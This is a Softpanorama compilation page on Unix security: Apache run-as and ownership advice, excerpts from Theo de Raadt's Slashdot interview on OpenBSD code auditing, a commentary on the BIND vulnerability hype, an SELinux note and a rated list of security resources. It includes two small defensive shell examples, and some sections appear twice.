As for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these accounts are heavily restricted from accessing anything important, as the httpd.conf file shows:

#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apache

Most Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), the home directory is usually the www root, and no command shell is available. This is slightly safer than using nobody because the "nobody" account may be used by other services. If an attacker manages to get the privileges of "nobody" on the system, she may be able to elevate privileges using some other software. Segmenting services such as "apache" under their own dedicated users is a better strategy.

Buffy (buffy@securityportal.com)
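For illustration, here is what such a locked service account typically looks like in /etc/passwd (a hypothetical entry; field layout per passwd(5)): no usable password, home under the web tree, and no login shell.

```shell
#!/bin/sh
# Hypothetical /etc/passwd entry for a locked "apache" service account.
entry='apache:x:48:48:Apache:/var/www:/sbin/nologin'
shell=$(printf '%s' "$entry" | cut -d: -f7)   # field 7 is the login shell
[ "$shell" = "/sbin/nologin" ] && echo "apache has no interactive shell"
```

On most Linux systems such an account is created with something like `useradd -r -s /sbin/nologin apache` (flags per shadow-utils).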

Slashdot: Theo de Raadt Responds

Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmer's knowledge. A book on auditing and how to avoid security pitfalls when coding would also make your life easier - less code to audit for OpenBSD, and more time to concentrate on nifty new features!!!

Theo:

There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side, auditing, which is where an outsider (or an insider) later on goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two. In the end though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that. The programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree also showed us that most programmers learn to code by (bad) examples. A solid systems approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).

OpenBSD has a well-deserved reputation for security "out of the box" and for the fact that the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit.

My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?

Theo:

We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.

But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't usually get all that excited about suddenly burning 800 hours in some disgusting piece of badly programmed trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...

With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACLs, etc., ad nauseam, how is OpenBSD approaching the issue of resource control?

... ...

Theo:

On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we will see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.

Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More importantly, where did you learn it from? Is there some "mentor" you looked to for ridge design? I have to admire your team's daunting code reviewing... I wonder if I'll ever have that kind of meticulous coding nature.

Theo:

The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it became fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree every time we found a sloppiness. Every time we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fixed that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?
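The mktemp(3) race Theo cites has a direct shell analogue, sketched below assuming mktemp(1) is available: a temp path built from the guessable PID can be pre-created or symlinked by an attacker, while mktemp(1) creates the file atomically with an unpredictable name and owner-only permissions.

```shell
#!/bin/sh
# Racy pattern: the name is predictable, so an attacker can plant a
# symlink between the name choice and the open. Shown only as a warning;
# this script never actually opens it.
unsafe="/tmp/scratch.$$"

# Safe pattern: mktemp(1) creates the file atomically with mode 0600.
safe=$(mktemp) || exit 1
perms=$(ls -l "$safe" | cut -c1-10)
echo "created temp file with permissions $perms"
rm -f "$safe"
```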

Older news items were moved to a separate file due to volume -- see OSS Security Chronicle


eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

eSecurity Planet: Trends: Updated Open Source Security Testing ...

... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...

The sky is not falling By Dev Zaborav

Recently, notifications started going out regarding a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts were referring to this as the next major Internet bug -- drawing near-panicked comparisons to the massive, widespread BIND attacks of 1998. Many even went to the point of proclaiming that this incident will be the next great Internet-crippling bug.

To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.

However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.

The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.

Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.

eveloperWorks/Linux Security: Improving the security of open UNIX platforms -- simple MD5 checking shell script(bash) by Igor Maximov (uniug@cris.net). Nothing special.

[Dec 28, 2000] NSA Security-Enhanced Linux

The has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies have been performed of the ability of the architecture to support a wide variety of security policies and are available on the DTOS and Flask web pages accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html). RSBAC appears to have similar goals to the Security-Enhanced Linux. Like the Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control or GFAC) than the Security-Enhanced Linux, although the Flask paper notes that at the highest level of abstraction, the the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.

SecurityPortal - Ask Buffy Apache Security

I am trying to implement security on the Apache Server 1.3.12 running on a Linux Red Hat 6.2. Are there any good docs or how-tos on this subject?

Aejaz Sheriff

Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:

http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/

The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:

http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development

And I highly recommend reading it.

Buffy (buffy@securityportal.com)

Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.

Brad

The usual default for "owning" Apache is user and group root:

-rwxr-xr-x    1 root     root
       301820 Aug 23 13:45 /usr/sbin/httpd

As for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these groups are heavily restricted from accessing anything important, from the httpd.conf file:

#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apache

Most Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), the home directory is usually the www root, and no command shell is available. This is slightly safer than using nobody because the "nobody" account may be used by other services. If an attacker manages to get privileges of "nobody" on the system, she may be able to elevate privileges using some other software. Segmenting "apache" with different users is a better strategy.

Buffy (buffy@securityportal.com)

Slashdot Theo de Raadt Respond

Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmers knowledge. A book on audinting and how to avoid security pitfalls when coding would also make your life easier - less code to audit for OpenBSD, and more time top concentrate on nifty new features!!!

Theo:

There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side, auditing, which is where an outsider (or an insider) later on goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two. In the end though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that. The programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree, also showed us that most programmers learn to code by (bad) examples. A solid systems's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).

OpenBSD has a well deserved reputation for security "out of the box" and for the fact that the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure, because the auditing of INN, and other such software, is outside the scope of the BSD audit.

My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?

Theo:

We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.

But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't usually get all that excited about suddenly burning 800 hours on some disgusting piece of badly programmed trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...

With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACLs, etc., ad nauseam, how is OpenBSD approaching the issue of resource control?

... ...

Theo:

On the first question, I think there is great confusion in the land of Orange Book. Many people think that it is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we will see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.

Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More importantly, where did you learn it from? Is there some "mentor" you looked to for rigid design? I have to admire your team's daunting code reviewing... I wonder if I'll ever have that kind of meticulous coding nature.

Theo:

The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it became fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree every time we found sloppiness. Every time we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fixed that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?

Older news were moved to a separate file due to volume -- see OSS Security Chronicle


eSecurity Planet: Trends: Updated Open Source Security Testing Manual Available

Version 2 of the Open Source Security Testing Methodology Manual (OSSTMM) was posted; article by Paul Desmond.

Recommended Links

Softpanorama Top Visited

Softpanorama Recommended

Top dozen

  1. ***** NIST CSRC Home Page -- for a government site this is simply outstanding ;-)
  2. ***** CIAC -- provides vulnerabilities reports. The site also contains other materials but of much lesser quality and value.
  3. ***** NSA -- NSA guidelines. Not all of them are of equal quality (some can serve as an illustration of NSA degradation ;-) and some are outdated, but still ...
  4. **** The SANS Institute - A Cooperative Research and Education Organization -- contains top 20 list of vulnerabilities: questionable but still useful resource.
  5. **** ISS security library.
  6. **** Ronald L. Rivest Cryptography and Security -- nice collection of links
  7. ***** Console/Firewall and Security -- Freshmeat collection of tools
  8. Security Focus - computer security information clearinghouse. Includes a calendar, free tools, forums, industry news, and a library.
  9. ***+ Unix Security -- NIH Security Resources -- links from the National Institutes of Health. One of the better collections of security-related links: documents, links to other web pages, and tools, though many entries are outdated.
  10. *** Corporate Technologies Technical Library -- contains the list of free security software. Peter Galvin is chief technologist for Corporate Technologies, Inc.
  11. *** http://www.cs.purdue.edu/coast/archive/data/category_index.html -- COAST: outdated and badly maintained, but still sometimes useful
  12. *** Root Shell -- Security and Exploit reference. A little bit speculative

Non-government

Vendors:

Government:

University Centers


Archives

Information about major open source security tools can be found at Softpanorama University Classic Open Source Unix Security Tools. Here are some archives that one might find useful:


Usenet and lists

**** BugTraq -- full-disclosure UNIX security mailing list.

RISKS-LIST RISKS-FORUM Digest

www.eds.org -- The Security-Audit Mailing list FAQ


See Also


History

Improving the Security of Your UNIX System by David A. Curry. The "SRI Paper" that has been widely distributed around the Internet. It was written in 1990 and was a predecessor to the UNIX System Security book. David A. Curry is the author of UNIX Systems Programming for SVR4 and is also an active tool developer (see his home page for the complete list). Among them are (descriptions are borrowed from the author's page):

How to improve security on SunOS 4.1.3 -- outdated, but some information can be useful

Improving the Security of Your Site by Breaking Into it -- famous (now outdated) SATAN-related paper. Not that SATAN was better than other scanners, but the name provoked a media frenzy that gave the authors a lot of exposure...

1993: An Architectural Overview of UNIX Network Security (February 18, 1993) by Robert B. Reinhardt (breinhar@access.digex.com)


Philosophy


Tutorials

See also CIAC advisories below. Shorter tutorials are listed in Articles. There is also a useful list at http://secinf.net/unix_security/

Etc


Magazines


Government Publications

NIST

CIAC

CERT:


Vendors Pages

See also: SecurityPortal -- recent security news. Good...

IBM Security home page

Red Hat

Caldera's security page.


FAQs

See also metalinks:

Security FAQs - the list of security-related FAQs maintained by Internet Security Systems, Inc.

Shadow Password HOWTO. Note: Caldera 1.3 and later install a shadow password file by default; Red Hat 6.0 and later also install it.

Security HOWTO

[Nov.7,1998] www.eds.org -- The Security-Audit Mailing list FAQ

Frequently Asked Questions (FAQ)


ACL


VPN


X-Windows Security


Random Findings




Etc

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusively for research and educational purposes. If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner.

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less than 90 days. Multiple types of probes increase this period.

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith : Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda : SE quotes : Language Design and Programming Quotes : Random IT-related quotes : Somerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose Bierce : Bernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds : Larry Wall : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOS : Programming Languages History : PL/1 : Simula 67 : C : History of GCC development : Scripting Languages : Perl history : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-Month : How to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater's Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least


Copyright © 1996-2015 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author's free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense, so you need to be aware of the Google privacy policy. If you do not want to be tracked by Google, please disable JavaScript for this site. This site is perfectly usable without JavaScript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.


This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contains some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting the development of this site and speeding up access. In case softpanorama.org is down, there are currently two functional mirrors: softpanorama.info (the fastest) and softpanorama.net.

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author's present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: June 03, 2016